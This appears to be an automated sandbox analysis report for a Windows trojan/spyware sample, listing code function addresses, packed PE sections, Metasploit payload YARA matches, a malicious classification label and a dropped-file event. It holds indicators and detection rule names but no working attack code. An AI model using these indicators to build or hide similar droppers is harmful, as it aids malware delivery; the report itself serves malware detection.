Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040BA50	12_2_0040BA50
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00412AF8	12_2_00412AF8
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00444300	12_2_00444300
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042CBA0	12_2_0042CBA0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004283A0	12_2_004283A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044C3A0	12_2_0044C3A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041BCC0	12_2_0041BCC0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00447DF0	12_2_00447DF0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042FE40	12_2_0042FE40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044CE10	12_2_0044CE10
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00415EF9	12_2_00415EF9
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00401040	12_2_00401040
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041F065	12_2_0041F065
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00417870	12_2_00417870
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00427830	12_2_00427830
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00445830	12_2_00445830
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00449832	12_2_00449832
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040D940	12_2_0040D940
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00402140	12_2_00402140
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00426150	12_2_00426150
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00451150	12_2_00451150
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00439160	12_2_00439160
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00442168	12_2_00442168
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040B970	12_2_0040B970
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00451170	12_2_00451170
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00424900	12_2_00424900
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042D92B	12_2_0042D92B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0045113C	12_2_0045113C
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040F9C0	12_2_0040F9C0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004139D0	12_2_004139D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0043B9F9	12_2_0043B9F9
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00412185	12_2_00412185
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00445250	12_2_00445250
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00429A70	12_2_00429A70
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042020C	12_2_0042020C
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00426A15	12_2_00426A15
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041E21B	12_2_0041E21B
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004292C0	12_2_004292C0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044CAE0	12_2_0044CAE0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00408A80	12_2_00408A80
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044B280	12_2_0044B280
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00431290	12_2_00431290
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00445AA0	12_2_00445AA0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004512AC	12_2_004512AC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004252B0	12_2_004252B0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00402B50	12_2_00402B50
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041C833	12_2_0041C833
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040A320	12_2_0040A320
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040C320	12_2_0040C320
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00416B81	12_2_00416B81
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044B380	12_2_0044B380
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00411C5F	12_2_00411C5F
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042D460	12_2_0042D460
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00432407	12_2_00432407
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0043F410	12_2_0043F410
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042F430	12_2_0042F430
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0043DC31	12_2_0043DC31
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004384C3	12_2_004384C3
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040D4D0	12_2_0040D4D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004434DF	12_2_004434DF
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041DCDF	12_2_0041DCDF
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044B4F0	12_2_0044B4F0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00410483	12_2_00410483
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042F489	12_2_0042F489
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00424C90	12_2_00424C90
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044BCB6	12_2_0044BCB6
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00409540	12_2_00409540
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00443540	12_2_00443540
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0043155F	12_2_0043155F
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00403560	12_2_00403560
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00425560	12_2_00425560
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00413D09	12_2_00413D09
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040AD20	12_2_0040AD20
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0043B536	12_2_0043B536
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041EDDC	12_2_0041EDDC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044B580	12_2_0044B580
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00420D90	12_2_00420D90
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00407DA0	12_2_00407DA0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004305B2	12_2_004305B2
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00433640	12_2_00433640
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00448650	12_2_00448650
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0043C610	12_2_0043C610
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00437627	12_2_00437627
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044B622	12_2_0044B622
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040CE30	12_2_0040CE30
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040E6D0	12_2_0040E6D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00444ED0	12_2_00444ED0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00445ED1	12_2_00445ED1
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004326E0	12_2_004326E0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004386EC	12_2_004386EC
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00430E93	12_2_00430E93
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00410EAB	12_2_00410EAB
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00403F00	12_2_00403F00
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0043E703	12_2_0043E703
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0041AF00	12_2_0041AF00
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040C710	12_2_0040C710
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00436729	12_2_00436729
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0042D730	12_2_0042D730
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00408FC0	12_2_00408FC0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0044C7D0	12_2_0044C7D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004047E2	12_2_004047E2
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_004437A0	12_2_004437A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_0040EFAE	12_2_0040EFAE
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B658A0	12_2_00B658A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7E0A0	12_2_00B7E0A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B68090	12_2_00B68090
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B70890	12_2_00B70890
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B83890	12_2_00B83890
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B91890	12_2_00B91890
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B64080	12_2_00B64080
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8D080	12_2_00B8D080
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B900D0	12_2_00B900D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7A820	12_2_00B7A820
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B79020	12_2_00B79020
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8A020	12_2_00B8A020
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7C010	12_2_00B7C010
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B93813	12_2_00B93813
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B61000	12_2_00B61000
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B66070	12_2_00B66070
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8F060	12_2_00B8F060
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B74040	12_2_00B74040
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8F9B0	12_2_00B8F9B0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B76180	12_2_00B76180
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B631F0	12_2_00B631F0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7B1E0	12_2_00B7B1E0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B92920	12_2_00B92920
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B80110	12_2_00B80110
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00BAC908	12_2_00BAC908
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B89100	12_2_00B89100
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6E170	12_2_00B6E170
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B93160	12_2_00B93160
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B64940	12_2_00B64940
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7C940	12_2_00B7C940
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B89AB0	12_2_00B89AB0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6EAA0	12_2_00B6EAA0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B74290	12_2_00B74290
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B62280	12_2_00B62280
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8F2E0	12_2_00B8F2E0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6F2D0	12_2_00B6F2D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B752C0	12_2_00B752C0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B65220	12_2_00B65220
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B69220	12_2_00B69220
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B85220	12_2_00B85220
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B80A10	12_2_00B80A10
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B86A00	12_2_00B86A00
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B88200	12_2_00B88200
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B88A50	12_2_00B88A50
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B96A54	12_2_00B96A54
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7ABA0	12_2_00B7ABA0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B66390	12_2_00B66390
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B73390	12_2_00B73390
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B773F0	12_2_00B773F0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7F3D0	12_2_00B7F3D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6C310	12_2_00B6C310
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6B300	12_2_00B6B300
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7FB70	12_2_00B7FB70
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B81370	12_2_00B81370
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B80350	12_2_00B80350
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B68340	12_2_00B68340
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8EB40	12_2_00B8EB40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B654A0	12_2_00B654A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B70490	12_2_00B70490
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B93C90	12_2_00B93C90
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B66C80	12_2_00B66C80
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B76480	12_2_00B76480
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B85480	12_2_00B85480
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B92480	12_2_00B92480
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7CCE0	12_2_00B7CCE0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6E4C0	12_2_00B6E4C0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B73CC0	12_2_00B73CC0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B65C20	12_2_00B65C20
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00BA1420	12_2_00BA1420
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B9B41A	12_2_00B9B41A
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B93477	12_2_00B93477
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B85C60	12_2_00B85C60
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B88450	12_2_00B88450
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B62C40	12_2_00B62C40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7EC40	12_2_00B7EC40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B88C40	12_2_00B88C40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B755B0	12_2_00B755B0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8EDB0	12_2_00B8EDB0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B69580	12_2_00B69580
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8DD80	12_2_00B8DD80
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8F5D0	12_2_00B8F5D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B935C0	12_2_00B935C0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B67D30	12_2_00B67D30
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6F530	12_2_00B6F530
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6AD30	12_2_00B6AD30
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B79500	12_2_00B79500
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7D560	12_2_00B7D560
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7DD50	12_2_00B7DD50
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8FD50	12_2_00B8FD50
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B78540	12_2_00B78540
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7C6A0	12_2_00B7C6A0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B72E90	12_2_00B72E90
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B88690	12_2_00B88690
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B92E90	12_2_00B92E90
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B8B680	12_2_00B8B680
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B726F0	12_2_00B726F0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B91EF0	12_2_00B91EF0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7B630	12_2_00B7B630
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B89630	12_2_00B89630
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B77620	12_2_00B77620
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B70E20	12_2_00B70E20
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B90620	12_2_00B90620
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B64660	12_2_00B64660
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B77E50	12_2_00B77E50
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B68640	12_2_00B68640
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B63640	12_2_00B63640
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B76E40	12_2_00B76E40
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B61790	12_2_00B61790
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B76790	12_2_00B76790
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6B780	12_2_00B6B780
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00BAE782	12_2_00BAE782
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B80F80	12_2_00B80F80
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B69FF0	12_2_00B69FF0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B667D0	12_2_00B667D0
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B6E730	12_2_00B6E730
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B79720	12_2_00B79720
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B89F00	12_2_00B89F00
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: 12_2_00B7FF70	12_2_00B7FF70

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: String function: 00B96F60 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: String function: 0041AEF0 appears 102 times
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: String function: 00B9F1CC appears 46 times
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: String function: 0040B350 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe	Code function: String function: 00BA4014 appears 34 times

Source: wJWNpO6lcm.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0000000D.00000002.3842910350.000000000DB2C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000D.00000002.3842910350.000000000DB82000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000D.00000002.3842910350.000000000DC12000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: wJWNpO6lcm.exe	Static PE information: Section: lzhxcjlt ZLIB complexity 0.9943702028508772
Source: rapes.exe.0.dr	Static PE information: Section: lzhxcjlt ZLIB complexity 0.9943702028508772
Source: random[1].exe.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: 2ea5560900.exe.6.dr	Static PE information: Section: .bss ZLIB complexity 1.0003231990014265
Source: random[1].exe0.6.dr	Static PE information: Section: wmmvgpos ZLIB complexity 0.994652103852839
Source: a99d155ba8.exe.6.dr	Static PE information: Section: wmmvgpos ZLIB complexity 0.994652103852839

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@13/7@1/5

Source: C:\Users\user\AppData\Local\Temp\10198670101\2ea5560900.exe

Code function: 12_2_00444300 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

12_2_00444300

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe

